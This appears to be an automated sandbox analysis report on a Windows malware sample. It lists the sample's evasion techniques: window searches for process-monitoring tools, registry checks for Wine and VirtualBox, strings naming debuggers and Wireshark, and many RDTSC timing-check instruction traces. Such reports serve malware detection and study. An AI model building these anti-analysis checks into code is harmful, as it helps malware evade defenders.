Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01A69498 push esi; iretd	0_3_01A6A5BA

Source: sYPORwmgwQ.exe

Static PE information: section name: sbkcwdwk entropy: 7.954868506160059

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Window searched: window name: Regmonclass	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: sYPORwmgwQ.exe, 00000000.00000003.2082066041.00000000076B0000.00000004.00001000.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: PROCMON.EXE
Source: sYPORwmgwQ.exe, 00000000.00000003.2082066041.00000000076B0000.00000004.00001000.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: X64DBG.EXE
Source: sYPORwmgwQ.exe, 00000000.00000003.2082066041.00000000076B0000.00000004.00001000.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: WINDBG.EXE
Source: sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: sYPORwmgwQ.exe, 00000000.00000003.2082066041.00000000076B0000.00000004.00001000.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: EE179B second address: EE17AD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1DECBA0FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F1DECBA0FD6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: EE17AD second address: EE17B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1054035 second address: 105403B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 105403B second address: 1054045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1054045 second address: 1054058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pushad 0x00000007 jnc 00007F1DECBA0FD8h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1046A3C second address: 1046A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jo 00007F1DED527546h 0x0000000c jp 00007F1DED527546h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1046A4F second address: 1046A79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1DECBA0FE5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1046A79 second address: 1046A7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1046A7D second address: 1046A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1046A85 second address: 1046A96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1DED52754Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1046A96 second address: 1046A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1046A9F second address: 1046AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1046AA3 second address: 1046ABB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FE4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1053064 second address: 1053072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10531B8 second address: 10531BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10531BE second address: 10531C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10531C7 second address: 10531CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10531CC second address: 10531E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527558h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10531E9 second address: 10531EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1053321 second address: 1053327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1053327 second address: 1053338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F1DECBA0FDCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 105360E second address: 1053616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1053616 second address: 105361A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 105361A second address: 1053624 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1DED527546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1053781 second address: 105379C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1DECBA0FD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F1DECBA0FDCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10538FD second address: 1053901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1053901 second address: 1053924 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1DECBA0FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F1DECBA0FE5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10566C0 second address: EE179B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 add dword ptr [esp], 11FD0F3Eh 0x0000000d jmp 00007F1DED52754Eh 0x00000012 push dword ptr [ebp+122D0FF1h] 0x00000018 jmp 00007F1DED527556h 0x0000001d call dword ptr [ebp+122D1B61h] 0x00000023 pushad 0x00000024 mov dword ptr [ebp+122D2EBFh], ecx 0x0000002a xor eax, eax 0x0000002c jmp 00007F1DED527559h 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 mov dword ptr [ebp+122D2EBFh], ecx 0x0000003b mov dword ptr [ebp+122D367Ah], eax 0x00000041 cld 0x00000042 mov esi, 0000003Ch 0x00000047 cld 0x00000048 add esi, dword ptr [esp+24h] 0x0000004c jmp 00007F1DED52754Fh 0x00000051 pushad 0x00000052 mov edx, ebx 0x00000054 mov dword ptr [ebp+122D2EBFh], edx 0x0000005a popad 0x0000005b lodsw 0x0000005d mov dword ptr [ebp+122D2EBFh], ebx 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 xor dword ptr [ebp+122D2469h], esi 0x0000006d mov ebx, dword ptr [esp+24h] 0x00000071 clc 0x00000072 push eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F1DED52754Bh 0x0000007b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1056732 second address: 1056788 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sbb ecx, 11113891h 0x00000011 push 00000000h 0x00000013 mov ch, 7Ah 0x00000015 call 00007F1DECBA0FD9h 0x0000001a jns 00007F1DECBA0FE2h 0x00000020 jnc 00007F1DECBA0FDCh 0x00000026 push eax 0x00000027 jmp 00007F1DECBA0FDDh 0x0000002c mov eax, dword ptr [esp+04h] 0x00000030 pushad 0x00000031 jmp 00007F1DECBA0FDBh 0x00000036 jbe 00007F1DECBA0FDCh 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1056788 second address: 1056795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1056795 second address: 105679B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 105679B second address: 105680D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F1DED527557h 0x00000011 pop eax 0x00000012 mov edi, dword ptr [ebp+122D3586h] 0x00000018 push 00000003h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F1DED527548h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D1B73h], edi 0x0000003a push 00000000h 0x0000003c mov ecx, 2EE23D00h 0x00000041 mov esi, edi 0x00000043 push 00000003h 0x00000045 movsx edx, ax 0x00000048 push BB227C7Ah 0x0000004d jo 00007F1DED527558h 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 105680D second address: 1056811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1056811 second address: 1056835 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1DED527546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 04DD8386h 0x00000011 lea ebx, dword ptr [ebp+12448620h] 0x00000017 mov dword ptr [ebp+122D1E9Ch], eax 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1056835 second address: 105683F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1DECBA0FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10568A2 second address: 10568A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10568A7 second address: 1056907 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007F1DECBA0FDEh 0x00000011 je 00007F1DECBA0FD8h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F1DECBA0FD8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 jnl 00007F1DECBA0FDCh 0x0000003a push 00000000h 0x0000003c clc 0x0000003d mov edi, dword ptr [ebp+122D3446h] 0x00000043 call 00007F1DECBA0FD9h 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b jg 00007F1DECBA0FD6h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1056907 second address: 105696D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F1DED52754Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push ebx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 ja 00007F1DED527546h 0x0000001b popad 0x0000001c pop ebx 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 jmp 00007F1DED527550h 0x00000026 mov eax, dword ptr [eax] 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F1DED527559h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 105696D second address: 1056971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1056971 second address: 105697B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 105697B second address: 105698C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 105698C second address: 1056992 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1056992 second address: 10569EF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1DECBA0FDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [ebp+122D26DFh], eax 0x00000011 push 00000003h 0x00000013 mov edx, 6A7E8799h 0x00000018 push 00000000h 0x0000001a mov ecx, 504491F7h 0x0000001f push 00000003h 0x00000021 pushad 0x00000022 sbb esi, 3BAA9C84h 0x00000028 or edi, 667D4226h 0x0000002e popad 0x0000002f mov edi, eax 0x00000031 call 00007F1DECBA0FD9h 0x00000036 push eax 0x00000037 push ecx 0x00000038 pushad 0x00000039 popad 0x0000003a pop ecx 0x0000003b pop eax 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F1DECBA0FE4h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10569EF second address: 1056A1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jns 00007F1DED527554h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007F1DED527548h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1056A1D second address: 1056A44 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F1DECBA0FD6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1DECBA0FE5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1056A44 second address: 1056A49 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1056A49 second address: 1056A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F1DECBA0FD8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov edx, dword ptr [ebp+122D295Ch] 0x00000028 lea ebx, dword ptr [ebp+12448629h] 0x0000002e xchg eax, ebx 0x0000002f jl 00007F1DECBA0FE7h 0x00000035 jmp 00007F1DECBA0FE1h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push edx 0x0000003e push ebx 0x0000003f pop ebx 0x00000040 pop edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1056B3F second address: 1056B5D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1DED527548h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F1DED52754Ch 0x00000016 jg 00007F1DED527546h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1056B5D second address: 1056B91 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F1DECBA0FE0h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push edi 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c jmp 00007F1DECBA0FDCh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1068521 second address: 1068527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10779FB second address: 1077A00 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 107625F second address: 1076263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1076372 second address: 1076390 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F1DECBA0FDCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1076390 second address: 1076396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1076396 second address: 10763A9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1DECBA0FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b js 00007F1DECBA0FD6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10763A9 second address: 10763B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10763B9 second address: 10763BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10763BD second address: 10763C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10763C6 second address: 10763D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1DECBA0FD6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10767D2 second address: 10767DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10767DC second address: 10767E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 106ABCF second address: 106ABD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1077544 second address: 107756A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnp 00007F1DECBA0FD6h 0x0000000c popad 0x0000000d jmp 00007F1DECBA0FDEh 0x00000012 popad 0x00000013 push edx 0x00000014 pushad 0x00000015 jnl 00007F1DECBA0FD6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 107C420 second address: 107C43B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1DED52754Fh 0x00000011 rdtsc
